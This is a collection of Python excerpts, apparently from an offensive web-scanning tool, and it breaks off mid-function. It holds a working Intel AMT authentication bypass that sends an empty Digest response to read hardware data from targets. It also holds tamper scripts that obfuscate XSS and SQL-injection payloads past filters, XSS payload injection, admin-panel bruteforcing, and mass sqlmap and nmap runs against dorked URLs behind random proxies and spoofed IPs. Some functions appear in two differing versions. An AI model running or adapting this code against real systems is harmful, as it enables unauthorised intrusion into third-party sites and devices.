Example #1
def __get_auth_headers(target, port=16992, source=None, agent=None, proxy=None):
    if not source or 'WWW-Authenticate' not in source.headers:
        logger.info(set_color(
            "header value not established, attempting to get bypass..."
        ))
        source = requests.get("http://{0}:{1}/index.htm".format(target, port), timeout=10, headers={
            'connection': 'close', 'user-agent': agent
        }, proxies=proxy)
        return source
    # Get digest and nonce and return the new header
    if 'WWW-Authenticate' in source.headers:
        logger.info(set_color(
            "header value established successfully, attempting authentication..."
        ))
        data = re.compile('Digest realm="Digest:(.*)", nonce="(.*)",stale="false",qop="auth"').search(
            source.headers['WWW-Authenticate'])
        digest = data.group(1)
        nonce = data.group(2)
        return 'Digest username="******", ' \
               'realm="Digest:{0}", nonce="{1}", ' \
               'uri="/index.htm", response="", qop=auth, ' \
               'nc=00000001, cnonce="deadbeef"'.format(digest, nonce)
    else:
        logger.info(set_color(
            "nothing found, will skip URL..."
        ))
        return None
Example #2
 def set_browser(self):
     """
     set the browser settings
     """
     profile = webdriver.FirefoxProfile()
     try:
         if not self.tor:
             logger.info(set_color(
                 "setting the browser..."
             ))
             profile.set_preference("general.useragent.override", self.agent)
             browser = webdriver.Firefox(profile, proxy=self.__set_proxy())
         elif self.xforward:
             profile = self.__set_x_forward(profile)
             browser = webdriver.Firefox(profile, proxy=self.__set_proxy())
         else:
             logger.info(set_color(
                 "setting the Tor browser emulation..."
             ))
             profile = self.__tor_browser_emulation(profile)
             browser = webdriver.Firefox(profile)
     except (OSError, WebDriverException):
         if not self.tor:
             profile.set_preference("general.useragent.override", self.agent)
             browser = webdriver.Firefox(profile, proxy=self.__set_proxy(),
                                         executable_path=whichcraft.which("geckodriver"))
         elif self.xforward:
             profile = self.__set_x_forward(profile)
             browser = webdriver.Firefox(profile, proxy=self.__set_proxy())
         else:
             profile = self.__tor_browser_emulation(profile)
             browser = webdriver.Firefox(profile, executable_path=whichcraft.which("geckodriver"))
     return browser
Example #3
def main_intel_amt(url, agent=None, proxy=None):
    proxy = proxy_string_to_dict(proxy) or None
    agent = agent or DEFAULT_USER_AGENT
    logger.info(
        set_color(
            "attempting to connect to '{}' and get hardware info...".format(
                url)))
    try:
        json_data = __get_hardware(url, agent=agent, proxy=proxy)
        if json_data is None:
            logger.error(
                set_color("unable to get any information, skipping...",
                          level=40))
            pass
        else:
            print("-" * 40)
            for key in json_data.keys():
                print("{}:".format(str(key).capitalize()))
                for item in json_data[key]:
                    print(" - {}: {}".format(item.capitalize(),
                                             json_data[key][item]))
            print("-" * 40)
    except Exception as e:
        if "Temporary failure in name resolution" in str(e):
            logger.error(
                set_color("failed to connect on '{}', skipping...".format(url),
                          level=40))
            pass
        else:
            logger.exception(
                set_color(
                    "ran into exception '{}', cannot continue...".format(e)))
            request_issue_creation()
Example #4
def detect_plugins(html, headers, **kwargs):
    verbose = kwargs.get("verbose", False)

    try:
        retval = []
        plugin_skip_schema = ("__init__", ".pyc")
        plugin_file_list = [f for f in os.listdir(DETECT_PLUGINS_PATH) if not any(s in f for s in plugin_skip_schema)]
        for plugin in plugin_file_list:
            plugin = plugin[:-3]
            if verbose:
                logger.debug(set_color(
                    "loading script '{}'".format(plugin), level=10
                ))
            plugin_detection = "lib.plugins.{}"
            plugin_detection = plugin_detection.format(plugin)
            plugin_detection = importlib.import_module(plugin_detection)
            if plugin_detection.search(html, headers=headers) is True:
                retval.append((plugin_detection.__product__, plugin_detection.__description__))
        if len(retval) > 0:
            return retval
        return None
    except Exception as e:
        logger.exception(str(e))
        if "Read timed out." or "Connection reset by peer" in str(e):
            logger.warning(set_color(
                "plugin request failed, assuming no plugins and continuing", level=30
            ))
            return None
        else:
            logger.exception(set_color(
                "plugin detection has failed with error {}".format(str(e))
            ))
            request_issue_creation()
Example #5
 def __config_search_engine(verbose=False):
     """
     configure the search engine if one different from Google is given
     """
     non_default_msg = "specified to use non-default search engine..."
     se_message = "using '{}' as the search engine..."
     if opt.useDDG:
         if verbose:
             logger.debug(
                 set_color(se_message.format("DuckDuckGo"), level=10))
         logger.info(set_color(non_default_msg))
         se = AUTHORIZED_SEARCH_ENGINES["duckduckgo"]
     elif opt.useAOL:
         logger.warning(
             set_color("AOL will take a little longer due to pop-ups...",
                       level=30))
         if verbose:
             logger.debug(set_color(se_message.format("AOL"), level=10))
         logger.info(set_color(non_default_msg))
         se = AUTHORIZED_SEARCH_ENGINES["aol"]
     elif opt.useBing:
         if verbose:
             logger.debug(set_color(se_message.format("Bing"), level=10))
         logger.info(set_color(non_default_msg))
         se = AUTHORIZED_SEARCH_ENGINES["bing"]
     else:
         if verbose:
             logger.debug(
                 set_color("using default search engine (Google)...",
                           level=10))
         logger.info(set_color("using default search engine...")
                     ) if opt.fileToEnumerate is None else ""
         se = AUTHORIZED_SEARCH_ENGINES["google"]
     return se
Example #6
 def __choose_attack(choice, attacks):
     while True:
         if int(choice) in range(len(attacks)):
             return int(choice)
         else:
             logger.warning(
                 set_color("{} is not a valid choice...".format(choice)))
Example #7
def check_for_robots(url, ext="/robots.txt", data_sep="-" * 30):
    """
    check if the URL has a robots.txt in it and collect `interesting` information
    out of the page
    """
    url = replace_http(url)
    interesting = set()
    full_url = "{}{}{}".format("http://", url, ext)
    conn = requests.get(full_url)
    data = conn.content
    code = conn.status_code
    if code == 404:
        return False
    for line in data.split("\n"):
        if "Allow" in line:
            interesting.add(line.strip())
    if len(interesting) > 0:
        create_tree(full_url, list(interesting))
    else:
        to_display = prompt(
            "nothing interesting found in robots.txt would you like to display the entire page",
            opts="yN")
        if to_display.lower().startswith("y"):
            print("{}\n{}\n{}".format(data_sep, data, data_sep))
    logger.info(set_color("robots.txt page will be saved into a file..."))
    write_to_log_file(data, ROBOTS_PAGE_PATH, "robots-{}.log".format(url))
Example #8
def create_urls(url, payload_list, tamper=None):
    """
    create the tampered URLs, write them to a temporary file and read them from there
    """
    tf = tempfile.NamedTemporaryFile(delete=False)
    tf_name = tf.name
    with tf as tmp:
        for i, payload in enumerate(payload_list):
            if tamper:
                try:
                    if i < 1:
                        payload = __tamper_payload(payload,
                                                   tamper_type=tamper,
                                                   warning=True)
                    else:
                        payload = __tamper_payload(payload,
                                                   tamper_type=tamper,
                                                   warning=False)
                except InvalidTamperProvided:
                    logger.error(
                        set_color(
                            "you provided and invalid tamper script, acceptable tamper scripts are: {}..."
                            .format(" | ".join(list_tamper_scripts()),
                                    level=40)))
                    shutdown()
            loaded_url = "{}{}\n".format(url.strip(), payload.strip())
            tmp.write(loaded_url)
    return tf_name
Example #9
def __get_hardware(target, agent=None, proxy=None):
    """
    collect all the hardware information from an exploitable target
    """
    req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy)
    if not req.status_code == 200:
        return None
    logger.info(set_color("connected successfully getting hardware info..."))
    tree = html.fromstring(req.content)
    raw = tree.xpath('//td[@class="r1"]/text()')
    bios_functions = tree.xpath('//td[@class="r1"]/table//td/text()')
    data = {
        'platform': {
            'model': raw[0],
            'manufacturer': raw[1],
            'version': raw[2],
            'serial': raw[4],
            'system_id': raw[5]
        },
        'baseboard': {
            'manufacturer': raw[6],
            'name': raw[7],
            'version': raw[8],
            'serial': raw[9],
            'tag': raw[10],
            'replaceable': raw[11]
        },
        'bios': {
            'vendor': raw[12],
            'version': raw[13],
            'date': raw[14],
            'functions': bios_functions
        }
    }
    return json.dumps(data)
Example #10
    def __run_attacks_main():
        which_log_to_use = {
            "dork": URL_LOG_PATH,
            "spider": SPIDER_LOG_PATH
        }

        options = (opt.useRandomDork, opt.dorkToUse, opt.dorkFileToUse, opt.fileToEnumerate)
        to_use = which_log_to_use["dork"] if any(arg for arg in options) is True else which_log_to_use["spider"]
        try:
            urls_to_use = get_latest_log_file(to_use)
        except TypeError:
            urls_to_use = None

        if urls_to_use is None:
            logger.error(set_color(
                "unable to run attacks appears that no file was created for the retrieved data...", level=40
            ))
            shutdown()
        options = [
            opt.runSqliScan, opt.runPortScan,
            opt.intelCheck, opt.adminPanelFinder,
            opt.runXssScan
        ]
        if any(options):
            with open(urls_to_use) as urls:
                for url in urls.readlines():
                    __run_attacks(
                        url.strip(),
                        sqlmap=opt.runSqliScan, nmap=opt.runPortScan,
                        intel=opt.intelCheck, xss=opt.runXssScan,
                        admin=opt.adminPanelFinder, verbose=opt.runInVerbose,
                        batch=opt.runInBatch, auto_start=opt.autoStartSqlmap
                    )
Example #11
def tamper(payload, warning=True, **kwargs):
    if warning:
        logger.warning(set_color(
            "base64 tamper scripts may increase the possibility of not finding vulnerabilities "
            "in otherwise vulnerable sites...", level=30
        ))
    return base64.b64encode(payload)
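A quick worked illustration of the base64 tamper above (a hedged usage sketch under Python 2, where base64.b64encode accepts and returns a str; the payload is hypothetical):
# encoded = tamper("' OR 1=1--", warning=False)
# encoded == "JyBPUiAxPTEtLQ=="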
Example #12
def tamper(payload, **kwargs):
    warning = kwargs.get("warning", True)

    if warning:
        logger.warning(
            set_color(
                "obfuscating payloads by their entity encoding equivalent may increase the "
                "risk of false positives",
                level=30))

    skip = ";"
    encoding_schema = {
        " ": "&nbsp;",
        "<": "&lt;",
        ">": "&gt;",
        "&": "&amp;",
        '"': "&quot;",
        "'": "&apos;",
    }
    retval = ""
    for char in str(payload):
        if char in encoding_schema.iterkeys():
            retval += encoding_schema[char]
        elif char not in encoding_schema.iterkeys() and char != skip:
            retval += char
        else:
            retval += char
    return retval
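A quick worked illustration of the entity-encoding tamper above (a hedged usage sketch; the payload is hypothetical):
# encoded = tamper('<script>alert("xss")</script>', warning=False)
# encoded == '&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;'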
Example #13
 def __create_arguments(sqlmap=False, nmap=False):
     """
     create the sqlmap arguments (a list of tuples) that will be passed to the API
     """
     logger.info(set_color(
         "creating arguments for {}...".format("sqlmap" if sqlmap else "nmap")
     ))
     retval = []
     splitter = {"sqlmap": ",", "nmap": "|"}
     if sqlmap:
         if opt.sqlmapArguments is not None:
             for line in opt.sqlmapArguments.split(splitter["sqlmap"]):
                 to_use = line.strip().split(" ")
                 option = (to_use[0], to_use[1])
                 if to_use[0] in SQLMAP_API_OPTIONS:
                     retval.append(option)
                 else:
                     logger.warning(set_color(
                         "option '{}' is not recognized by sqlmap API, skipping...".format(option[0]),
                         level=30
                     ))
     elif nmap:
         warning_msg = "option {} is not known by the nmap api, skipping..."
         if opt.nmapArguments is not None:
             for line in opt.nmapArguments.split(splitter["nmap"]):
                 try:
                     data = line.index(" ")
                 except Exception:
                     data = None
                     pass
                 if data is not None:
                     argument = line[0:data]
                     if argument in NMAP_API_OPTS:
                         retval.append(line)
                     else:
                         logger.warning(set_color(
                             warning_msg.format(argument), level=30
                         ))
                 else:
                     if line in NMAP_API_OPTS:
                         retval.append(line)
                     else:
                         logger.warning(set_color(
                             warning_msg.format(line), level=30
                         ))
     return retval
Example #14
def __get_raw_data(target, page, agent=None, proxy=None):
    logger.info(set_color("getting raw information..."))
    return requests.get("http://{0}:16992/{1}.htm".format(target, page),
                        headers={
                            'connection': 'close',
                            'Authorization': __get_auth_headers(target),
                            'user-agent': agent
                        },
                        proxies=proxy)
Example #15
def load_headers(url, **kwargs):
    """
    load the HTTP headers
    """
    agent = kwargs.get("agent", None)
    proxy = kwargs.get("proxy", None)
    xforward = kwargs.get("xforward", False)

    literal_match = re.compile(r"\\(\X(\d+)?\w+)?", re.I)

    req, _, _, _ = get_page(url, agent=agent, proxy=proxy)
    if len(req.cookies) > 0:
        logger.info(set_color(
            "found a request cookie, saving to file...", level=25
        ))
        try:
            cookie_start = req.cookies.keys()
            cookie_value = req.cookies.values()
            write_to_log_file(
                "{}={}".format(''.join(cookie_start), ''.join(cookie_value)),
                COOKIE_LOG_PATH, COOKIE_FILENAME.format(replace_http(url))
            )
        except Exception:
            write_to_log_file(
                [c for c in req.cookies.itervalues()], COOKIE_LOG_PATH,
                COOKIE_FILENAME.format(replace_http(url))
            )
    retval = {}
    do_not_use = []
    http_headers = req.headers
    for header in http_headers:
        try:
            # check for Unicode in the string, this is just a safety net in case something is missed
            # chances are nothing will be matched
            if literal_match.search(header) is not None:
                retval[header] = unicodedata.normalize(
                    "NFKD", u"{}".format(http_headers[header])
                ).encode("ascii", errors="ignore")
            else:
                # test to see if there are any unicode errors in the string
                retval[header] = unicodedata.normalize(
                    "NFKD", u"{}".format(http_headers[header])
                ).encode("ascii", errors="ignore")
        # just to be safe, we're going to put all the possible Unicode errors into a tuple
        except (UnicodeEncodeError, UnicodeDecodeError, UnicodeError, UnicodeTranslateError, UnicodeWarning):
            # if there are any errors, we're going to append them to a `do_not_use` list
            do_not_use.append(header)
    # clear the dict so we can re-add to it
    retval.clear()
    for head in http_headers:
        # if the header is in the list, we skip it
        if head not in do_not_use:
            retval[head] = http_headers[head]
    # return a dict of safe unicodeless HTTP headers
    return retval
Example #16
def tamper(payload, warning=True, **kwargs):
    if warning:
        logger.warning(
            set_color(
                "hex tamper scripts may increase the risk of false positives...",
                level=30))
    retval = hex(hash(payload))
    if "-" in str(retval):
        return retval[1:-1]
    else:
        return retval
Example #17
 def __extract_stacktrace(file_data):
     logger.info(set_color("extracting traceback from log file..."))
     retval, buff_mode, _buffer = [], False, ""
     with open(file_data, "r+") as log:
         for line in log:
             if "Traceback" in line:
                 buff_mode = True
             if line and len(line) < 5:
                 buff_mode = False
                 retval.append(_buffer)
                 _buffer = ""
             if buff_mode:
                 if len(line) > 400:
                     line = line[:400] + "...\n"
                 _buffer += line
     return "".join(retval)
Example #18
def tamper(payload, warning=True, **kwargs):
    if warning:
        logger.warning(
            set_color(
                "enclosing brackets is meant to be used as an obfuscation "
                "against an already valid vulnerable site...",
                level=30))

    to_enclose = string.digits
    retval = ""
    for char in payload:
        if char in to_enclose:
            char = "['{}']".format(char)
            retval += char
        else:
            retval += char
    return retval
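A quick worked illustration of the bracket-enclosing tamper above (a hedged usage sketch; the payload is hypothetical):
# enclosed = tamper("1=1", warning=False)
# enclosed == "['1']=['1']"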
Example #19
def tamper(payload, warning=True, **kwargs):
    if warning:
        logger.warning(
            set_color(
                "obfuscating the payloads by ordinal equivalents may increase the risk "
                "of false positives...",
                level=30))

    retval = ""
    danger_characters = "%&<>/\\;'\""
    for char in payload:
        if char in danger_characters:
            char = "%{}".format(ord(char) * 10 / 7)
            retval += char
        else:
            retval += char
    return retval
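A quick worked illustration of the ordinal tamper above (a hedged usage sketch assuming Python 2 integer division, in line with the rest of the codebase; the payload is hypothetical):
# obfuscated = tamper("<script>", warning=False)
# '<' (ord 60) maps to "%85" and '>' (ord 62) maps to "%88", so
# obfuscated == "%85script%88"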
Example #20
def tamper(payload, **kwargs):
    warning = kwargs.get("warning", True)
    if warning:
        logger.warning(
            set_color(
                "NULL encoding tamper scripts may increase the possibility of not finding vulnerabilities "
                "in otherwise vulnerable sites...",
                level=30))

    retval = ""
    encoder = "%00"
    for char in payload:
        if char == " ":
            char = encoder
            retval += char
        else:
            retval += char
    return retval
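A quick worked illustration of the NULL-encoding tamper above (a hedged usage sketch; the payload is hypothetical):
# encoded = tamper("UNION SELECT NULL", warning=False)
# encoded == "UNION%00SELECT%00NULL"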
Example #21
def load_headers(url, **kwargs):
    """
    load the URL headers
    """
    agent = kwargs.get("agent", None)
    proxy = kwargs.get("proxy", None)
    xforward = kwargs.get("xforward", False)

    if proxy is not None:
        proxy = proxy_string_to_dict(proxy)
    if not xforward:
        header_value = {
            HTTP_HEADER.CONNECTION: "close",
            HTTP_HEADER.USER_AGENT: agent
        }
    else:
        ip_list = create_random_ip(), create_random_ip(), create_random_ip()
        header_value = {
            HTTP_HEADER.CONNECTION: "close",
            HTTP_HEADER.USER_AGENT: agent,
            HTTP_HEADER.X_FORWARDED_FOR: "{}, {}, {}".format(
                ip_list[0], ip_list[1], ip_list[2]
            )
        }
    req = requests.get(url, headers=header_value, proxies=proxy, timeout=10)
    if len(req.cookies) > 0:
        logger.info(set_color(
            "found a request cookie, saving to file...", level=25
        ))
        try:
            cookie_start = req.cookies.keys()
            cookie_value = req.cookies.values()
            write_to_log_file(
                "{}={}".format(''.join(cookie_start), ''.join(cookie_value)),
                COOKIE_LOG_PATH, COOKIE_FILENAME.format(replace_http(url))
            )
        except Exception:
            write_to_log_file(
                [c for c in req.cookies.itervalues()], COOKIE_LOG_PATH,
                COOKIE_FILENAME.format(replace_http(url))
            )
    return req.headers
Example #22
 def __config_headers():
     """
     configure the request headers, this will configure user agents and proxies
     """
     if opt.proxyConfig is not None:
         proxy = opt.proxyConfig
     elif opt.proxyFileRand is not None:
         if opt.runInVerbose:
             logger.debug(set_color(
                 "loading random proxy from '{}'...".format(opt.proxyFileRand), level=10
             ))
         with open(opt.proxyFileRand) as proxies:
             possible = proxies.readlines()
             proxy = random.choice(possible).strip()
     else:
         proxy = None
     if opt.usePersonalAgent is not None:
         agent = opt.usePersonalAgent
     elif opt.useRandomAgent:
         agent = grab_random_agent(verbose=opt.runInVerbose)
     else:
         agent = DEFAULT_USER_AGENT
     return proxy, agent
Example #23
def main(url, show=False, verbose=False, **kwargs):
    """
    main method to be called
    """
    do_threading = kwargs.get("do_threading", False)
    proc_num = kwargs.get("proc_num", 3)
    logger.info(set_color("parsing robots.txt..."))
    results = check_for_robots(url)
    if not results:
        logger.warning(
            set_color(
                "seems like this page is blocking access to robots.txt...",
                level=30))
    logger.info(set_color("loading extensions..."))
    extensions = __load_extensions()
    if verbose:
        logger.debug(
            set_color("loaded a total of {} extensions...".format(
                len(extensions)),
                      level=10))
    logger.info(set_color("attempting to bruteforce admin panel..."))
    if do_threading:
        logger.warning(
            set_color("starting parallel processing with {} processes, this "
                      "will depend on your GPU speed...".format(proc_num),
                      level=30))
        tasks = []
        for _ in range(0, proc_num):
            p = multiprocessing.Process(target=check_for_admin_page,
                                        args=(url, extensions),
                                        kwargs={
                                            "show_possibles": show,
                                            "verbose": verbose
                                        })
            p.start()
            tasks.append(p)
        for proc in tasks:
            proc.join()
    else:
        check_for_admin_page(url,
                             extensions,
                             show_possibles=show,
                             verbose=verbose)
Example #24
    def __run_attacks_main(**kwargs):
        """
        main method to run the attacks
        """
        log_to_use = kwargs.get("log", None)
        if log_to_use is None:
            options = (opt.dorkToUse, opt.useRandomDork, opt.dorkFileToUse)
            log_to_use = URL_LOG_PATH if any(o for o in options) else SPIDER_LOG_PATH
            try:
                urls_to_use = get_latest_log_file(log_to_use)
            except TypeError:
                urls_to_use = None
        else:
            urls_to_use = log_to_use

        if urls_to_use is None:
            logger.error(set_color(
                "unable to run attacks appears that no file was created for the retrieved data", level=40
            ))
            shutdown()
        options = [
            opt.runSqliScan, opt.runPortScan,
            opt.adminPanelFinder, opt.runXssScan,
            opt.performWhoisLookup, opt.performClickjackingScan,
            opt.pgpLookup
        ]
        if any(options):
            with open(urls_to_use) as urls:
                for i, url in enumerate(urls.readlines(), start=1):
                    current = i
                    if "webcache" in url:
                        logger.warning(set_color(
                            "ran into unexpected webcache URL skipping", level=30
                        ))
                        current -= 1
                    else:
                        if url.strip() not in ("http://", "https://"):
                            logger.info(set_color(
                                "currently running on '{}' (target #{})".format(
                                    url.strip(), current
                                ), level=25
                            ))
                            logger.info(set_color(
                                "fetching target meta-data"
                            ))
                            identified = main_header_check(
                                url, verbose=opt.runInVerbose, agent=agent_to_use,
                                proxy=proxy_to_use, xforward=opt.forwardedForRandomIP,
                                identify_plugins=opt.identifyPlugin, identify_waf=opt.identifyProtection,
                                show_description=opt.showPluginDescription
                            )
                            if not identified:
                                logger.error(set_color(
                                    "target is refusing to allow meta-data dumping, skipping", level=40
                                ))
                            run_attacks(
                                url.strip(),
                                sqlmap=opt.runSqliScan, nmap=opt.runPortScan, pgp=opt.pgpLookup,
                                xss=opt.runXssScan, whois=opt.performWhoisLookup, admin=opt.adminPanelFinder,
                                clickjacking=opt.performClickjackingScan, github=opt.searchGithub,
                                verbose=opt.runInVerbose, batch=opt.runInBatch,
                                auto_start=opt.autoStartSqlmap, xforward=opt.forwardedForRandomIP,
                                sqlmap_args=opt.sqlmapArguments, nmap_args=opt.nmapArguments,
                                show_all=opt.showAllConnections, do_threading=opt.threadPanels,
                                tamper_script=opt.tamperXssPayloads, timeout=opt.controlTimeout,
                                proxy=proxy_to_use, agent=agent_to_use, conf_file=opt.sqlmapConfigFile,
                                threads=opt.amountOfThreads, force_ssl=opt.forceSSL
                            )
                            print("\n")
                        else:
                            logger.warning(set_color(
                                "malformed URL discovered, skipping", level=30
                            ))
Example #25
    opt = ZeusParser.cmd_parser()

    ZeusParser().single_show_args(opt)

    # run the setup on the program
    setup(verbose=opt.runInVerbose)

    if not opt.hideBanner:
        print(BANNER)

    start_up()

    if opt.runInVerbose:
        being_run = find_running_opts(opt)
        logger.debug(set_color(
            "running with options '{}'".format(being_run), level=10
        ))

    logger.info(set_color(
        "log file being saved to '{}'".format(get_latest_log_file(CURRENT_LOG_FILE_PATH))
    ))


    def __run_attacks_main(**kwargs):
        """
        main method to run the attacks
        """
        log_to_use = kwargs.get("log", None)
        if log_to_use is None:
            options = (opt.dorkToUse, opt.useRandomDork, opt.dorkFileToUse)
            log_to_use = URL_LOG_PATH if any(o for o in options) else SPIDER_LOG_PATH
Example #26
def main_xss(start_url, verbose=False, proxy=None, agent=None, tamper=None):
    """
    main attack method to be called
    """
    if tamper:
        logger.info(set_color(
            "tampering payloads with '{}'...".format(tamper)))
    find_xss_script(start_url)
    logger.info(set_color("loading payloads..."))
    payloads = __load_payloads()
    if verbose:
        logger.debug(
            set_color("a total of {} payloads loaded...".format(len(payloads)),
                      level=10))
    logger.info(
        set_color(
            "payloads will be written to a temporary file and read from there..."
        ))
    filename = create_urls(start_url, payloads, tamper=tamper)
    logger.info(
        set_color("loaded URL's have been saved to '{}'...".format(filename)))
    logger.info(
        set_color("testing for XSS vulnerabilities on host '{}'...".format(
            start_url)))
    if proxy is not None:
        logger.info(set_color("using proxy '{}'...".format(proxy)))
    success = set()
    with open(filename) as urls:
        for i, url in enumerate(urls.readlines(), start=1):
            url = url.strip()
            result = scan_xss(url, proxy=proxy, agent=agent)
            payload = find_xss_script(url)
            if verbose:
                logger.info(set_color(
                    "trying payload '{}'...".format(payload)))
            if result[0] != "sqli" and result[0] is True:
                success.add(url)
                if verbose:
                    logger.debug(
                        set_color(
                            "payload '{}' appears to be usable...".format(
                                payload),
                            level=10))
            elif result[0] == "sqli":
                if i <= 1:
                    logger.error(
                        set_color(
                            "loaded URL '{}' threw a DBMS error and appears to be injectable, test for SQL injection, "
                            "backend DBMS appears to be '{}'...".format(
                                url, result[1]),
                            level=40))
                else:
                    if verbose:
                        logger.error(
                            set_color("SQL error discovered...", level=40))
            else:
                if verbose:
                    logger.debug(
                        set_color(
                            "host '{}' does not appear to be vulnerable to XSS attacks with payload '{}'..."
                            .format(start_url, payload),
                            level=10))
    if len(success) != 0:
        logger.info(set_color("possible XSS scripts to be used:"))
        create_tree(start_url, list(success))
    else:
        logger.error(
            set_color(
                "host '{}' does not appear to be vulnerable to XSS attacks...".
                format(start_url)))
    save = prompt("would you like to keep the URL's saved for further testing",
                  opts="yN")
    if save.lower().startswith("n"):
        os.remove(filename)
Example #27
def detect_protection(url, **kwargs):
    verbose = kwargs.get("verbose", False)
    agent = kwargs.get("agent", None)
    proxy = kwargs.get("proxy", None)
    xforward = kwargs.get("xforward", False)

    url = "{} {}".format(url.strip(), PROTECTION_CHECK_PAYLOAD)

    if verbose:
        logger.debug(set_color(
            "attempting connection to '{}'...".format(url), level=10
        ))
    try:
        _, status, html, headers = get_page(url, agent=agent, proxy=proxy, xforward=xforward)

        # make sure there are no DBMS errors in the HTML
        for dbms in DBMS_ERRORS:
            for regex in DBMS_ERRORS[dbms]:
                if re.compile(regex).search(html) is not None:
                    logger.warning(set_color(
                        "it appears that the WAF/IDS/IPS check threw a DBMS error and may be vulnerable "
                        "to SQL injection attacks. it appears the backend DBMS is '{}', site will be "
                        "saved for further processing...".format(dbms), level=30
                    ))
                    write_to_log_file(url, SQLI_SITES_FILEPATH, SQLI_FOUND_FILENAME)
                    return None

        retval = []
        file_list = [f for f in os.listdir(DETECT_FIREWALL_PATH) if not any(ex in f for ex in ["__init__", ".pyc"])]
        for item in file_list:
            item = item[:-3]
            if verbose:
                logger.debug(set_color(
                    "loading script '{}'...".format(item), level=10
                ))
            detection_name = "lib.firewall.{}"
            detection_name = detection_name.format(item)
            detection_name = importlib.import_module(detection_name)
            if detection_name.detect(html, headers=headers, status=status) is True:
                retval.append(detection_name.__item__)
        if len(retval) != 0:
            if len(retval) >= 2:
                try:
                    del retval[retval.index("Generic (Unknown)")]
                except (Exception, IndexError):
                    logger.warning(set_color(
                        "multiple firewalls identified ({}), displaying most likely...".format(
                            ", ".join([item.split("(")[0] for item in retval])
                        ), level=30
                    ))
                    del retval[retval.index(retval[1])]
                    if len(retval) >= 2:
                        del retval[retval.index(retval[1])]
            if retval[0] == "Generic (Unknown)":
                logger.warning(set_color(
                    "discovered firewall is unknown to Zeus, saving fingerprint to file. "
                    "if you know the details or the context of the firewall please create "
                    "an issue ({}) with the fingerprint, or a pull request with the script...".format(
                        ISSUE_LINK
                    ), level=30
                ))
                fingerprint = "<!---\nHTTP 1.1\nStatus Code: {}\nHTTP Headers: {}\n--->\n{}".format(
                    status, headers, html
                )
                write_to_log_file(fingerprint, UNKNOWN_FIREWALL_FINGERPRINT_PATH, UNKNOWN_FIREWALL_FILENAME)
            return "".join(retval) if isinstance(retval, list) else retval
        else:
            return None

    except Exception as e:
        if "Read timed out." or "Connection reset by peer" in str(e):
            logger.warning(set_color(
                "detection request failed, assuming no protection and continuing...", level=30
            ))
            return None
        else:
            logger.exception(set_color(
                "Zeus ran into an unexpected error '{}'...".format(e), level=50
            ))
            request_issue_creation()
            return None
Example #28
def main_header_check(url, **kwargs):
    """
    main function
    """
    verbose = kwargs.get("verbose", False)
    agent = kwargs.get("agent", None)
    proxy = kwargs.get("proxy", None)
    xforward = kwargs.get("xforward", False)
    identify = kwargs.get("identify", True)

    protection = {"hostname": url}
    definition = {
        "x-xss": ("protection against XSS attacks", "XSS"),
        "strict-transport": ("protection against unencrypted connections (force HTTPS connection)", "HTTPS"),
        "x-frame": ("protection against clickjacking vulnerabilities", "CLICKJACKING"),
        "x-content": ("protection against MIME type attacks", "MIME"),
        "x-csrf": ("protection against Cross-Site Forgery attacks", "CSRF"),
        "x-xsrf": ("protection against Cross-Site Forgery attacks", "CSRF"),
        "public-key": ("protection to reduce success rates of MITM attacks", "MITM"),
        "content-security": ("header protection against multiple attack types", "ALL")
    }

    try:
        if identify:
            logger.info(set_color(
                "checking if target URL is protected by some kind of WAF/IPS/IDS..."
            ))
            identified = detect_protection(url, proxy=proxy, agent=agent, verbose=verbose, xforward=xforward)

            if identified is None:
                logger.info(set_color(
                    "no WAF/IDS/IPS has been identified on target URL...", level=25
                ))
            else:
                logger.warning(set_color(
                    "the target URL WAF/IDS/IPS has been identified as '{}'...".format(identified), level=35
                ))

        if verbose:
            logger.debug(set_color(
                "loading XML data...", level=10
            ))
        comparable_headers = load_xml_data(HEADER_XML_DATA)
        logger.info(set_color(
            "attempting to get request headers for '{}'...".format(url.strip())
        ))
        try:
            found_headers = load_headers(url, proxy=proxy, agent=agent, xforward=xforward)
        except (ConnectionError, Exception) as e:
            if "Read timed out." or "Connection reset by peer" in str(e):
                found_headers = None
            else:
                logger.exception(set_color(
                    "Zeus has hit an unexpected error and cannot continue '{}'...".format(e), level=50
                ))
                request_issue_creation()

        if found_headers is not None:
            if verbose:
                logger.debug(set_color(
                    "fetched {}...".format(found_headers), level=10
                ))
            headers_established = [str(h) for h in compare_headers(found_headers, comparable_headers)]
            for key in definition.iterkeys():
                if any(key in h.lower() for h in headers_established):
                    logger.warning(set_color(
                        "provided target has {}...".format(definition[key][0]), level=30
                    ))
            for key in found_headers.iterkeys():
                protection[key] = found_headers[key]
            logger.info(set_color(
                "writing found headers to log file...", level=25
            ))
            return write_to_log_file(protection, HEADER_RESULT_PATH, HEADERS_FILENAME.format(replace_http(url)))
        else:
            logger.error(set_color(
                "unable to retrieve headers for site '{}'...".format(url.strip()), level=40
            ))
    except KeyboardInterrupt:
        if not pause():
            shutdown()
Example #29
def search_multiple_pages(query, link_amount, verbose=False, **kwargs):

    def __config_proxy(proxy_string):
        proxy_type_schema = {
            "http": httplib2.socks.PROXY_TYPE_HTTP,
            "socks4": httplib2.socks.PROXY_TYPE_SOCKS4,
            "socks5": httplib2.socks.PROXY_TYPE_SOCKS5
        }
        proxy_type = get_proxy_type(proxy_string)[0]
        proxy_dict = proxy_string_to_dict(proxy_string)
        proxy_config = httplib2.ProxyInfo(
            proxy_type=proxy_type_schema[proxy_type],
            proxy_host="".join(proxy_dict.keys()),
            proxy_port="".join(proxy_dict.values())
        )
        return proxy_config

    proxy, agent = kwargs.get("proxy", None), kwargs.get("agent", None)

    if proxy is not None:
        if verbose:
            logger.debug(set_color(
                "configuring to use proxy '{}'...".format(proxy), level=10
            ))
        __config_proxy(proxy)

    if agent is not None:
        if verbose:
            logger.debug(set_color(
                "settings user-agent to '{}'...".format(agent), level=10
            ))

    logger.warning(set_color(
        "multiple pages will be searched using Google's API client, searches may be blocked after a certain "
        "amount of time...", level=30
    ))
    results, limit, found, index = set(), link_amount, 0, google_api.search(query, user_agent=agent, safe="on")
    try:
        while limit > 0:
            results.add(next(index))
            limit -= 1
            found += 1
    except Exception as e:
        if "Error 503" in str(e):
            logger.fatal(set_color(
                "Google is blocking the current IP address, dumping already found URL's...", level=50
            ))
            results = results
            pass

    retval = set()
    for url in results:
        if URL_REGEX.match(url) and URL_QUERY_REGEX.match(url):
            if verbose:
                logger.debug(set_color(
                    "found '{}'...".format(url), level=10
                ))
            retval.add(url)

    if len(retval) != 0:
        logger.info(set_color(
            "a total of {} links found out of requested {}...".format(
